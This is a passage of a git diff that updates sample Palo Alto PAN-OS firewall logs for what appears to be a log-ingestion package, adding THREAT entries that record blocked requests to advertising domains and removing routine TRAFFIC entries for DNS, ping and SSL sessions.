+Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 PA-220 1,2018/11/30 
16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 
16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:28 PA-220 1,2018/11/30 
16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
+Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,
diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log
index c3e74310f06..ba304bf40ac 100644
--- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log
+++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-traffic.log 
@@ -1,100 +1,100 @@
-Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:15,192.168.15.196,216.58.194.99,192.168.1.63,216.58.194.99,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23003,1,46774,443,15252,443,0x400019,udp,allow,3627,2014,1613,8,2018/11/30 16:07:13,0,any,0,32091116,0x0,192.168.0.0-192.168.255.255,United States,0,5,3,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,209.234.224.22,192.168.1.63,209.234.224.22,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,23919,1,52408,443,40763,443,0x400053,tcp,allow,41753,20642,21111,113,2018/11/30 16:07:33,85,web-advertisements,0,32091117,0x0,192.168.0.0-192.168.255.255,United States,0,62,51,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,172.217.2.238,192.168.1.63,172.217.2.238,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,23698,1,59190,443,52881,443,0x400019,udp,allow,7097,3365,3732,16,2018/11/30 16:07:04,15,any,0,32091119,0x0,192.168.0.0-192.168.255.255,United States,0,7,9,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,17.249.60.78,192.168.1.63,17.249.60.78,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,98.138.49.44,192.168.1.63,98.138.49.44,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,72.30.3.43,192.168.1.63,72.30.3.43,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,172.217.9.142,192.168.1.63,172.217.9.142,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 
16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,54.84.80.198,192.168.1.63,54.84.80.198,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United 
